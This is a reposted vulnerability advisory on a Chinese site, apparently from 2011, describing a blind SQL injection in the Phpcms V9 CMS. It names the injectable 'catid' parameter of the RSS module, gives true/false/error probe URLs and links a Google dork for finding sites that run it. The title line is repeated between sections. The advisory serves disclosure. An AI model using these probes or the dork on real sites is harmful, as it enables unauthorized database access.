Phpcms V9 网站管理系统 SQL 盲注入漏洞

=================================================================
Phpcms V9 BLind SQL Injection Vulnerability
非常简单的英文,连我这英语不及格的都看得懂…… 囧~ 就不翻译了……
=================================================================
Phpcms V9 网站管理系统 SQL 盲注入漏洞

        Software: Phpcms V9
        Vendor: www.Phpcms.cn
        Vuln Type: BLind SQL Injection
        Download link: http://www.Phpcms.cn/2010/1229/326.html
        Author: eidelweiss
        contact: eidelweiss[at]windowslive[dot]com
        Home: www.eidelweiss.info
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        Google Dork:
            http://www.exploit-db.com/ghdb/3676/    //check here ^_^
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        References:
            http://eidelweiss-advisories.blogspot.com/2011/01/Phpcms-v9-blind-sql-injection.html
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        =================================================================
            exploit & p0c
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        [!] index.php?m=content&c=rss&catid=[valid catid]
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

            Example p0c
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        [!] http://host/index.php?m=content&c=rss&catid=10  <= True
        [!] http://host/index.php?m=content&c=rss&catid=-10 <= False
        [+] http://host/index.php?m=content&c=rss&catid=5   <= show MySQL Error (table)
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        =================================================================
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

=================================================================
Nothing Impossible In This World Even Nobody`s Perfect
=================================================================
Phpcms V9 网站管理系统 SQL 盲注入漏洞

    Phpcms V9 网站管理系统 SQL 盲注入漏洞,Phpcms V9 BLind SQL Injection Vulnerability,Phpcms V9 网站内容管理系统SQL注入,Phpcms V9 网站管理系统SQL盲注。

本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:http://yesck.com/post/432/

本文 暂无 评论

回复给

欢迎点评

联系我们

站长QQ:8117829

站长邮件:8117829@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code